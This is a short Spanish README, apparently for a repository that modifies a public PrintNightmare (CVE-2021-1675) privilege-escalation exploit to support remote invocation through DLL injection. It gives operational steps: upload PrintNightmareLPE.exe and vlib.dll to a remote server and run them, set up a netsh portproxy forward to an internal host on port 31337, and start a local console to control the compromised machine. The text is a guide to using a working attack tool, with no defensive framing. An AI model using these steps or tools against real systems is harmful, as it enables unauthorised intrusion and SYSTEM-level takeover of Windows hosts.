
Exploit de escalada de privilegios remota para CVE-2021-1675 (PrintNightmare) con inyección de DLL y soporte de reenvío de puertos para ejecución remota.
Modificado de https://github.com/sailay1996/PrintNightmare-LPE ,soporta invocación remota.
1、Sube PrintNightmareLPE.exe y vlib.dll al servidor remoto y ejecuta PrintNightmareLPE.exe.
2、En el equipo local, configura el reenvío de puertos netsh interface portproxy add v4tov4 listenport=31337 connectaddress=192.168.84.129 connectport=31337
3、En el equipo local, inicia xconsole.exe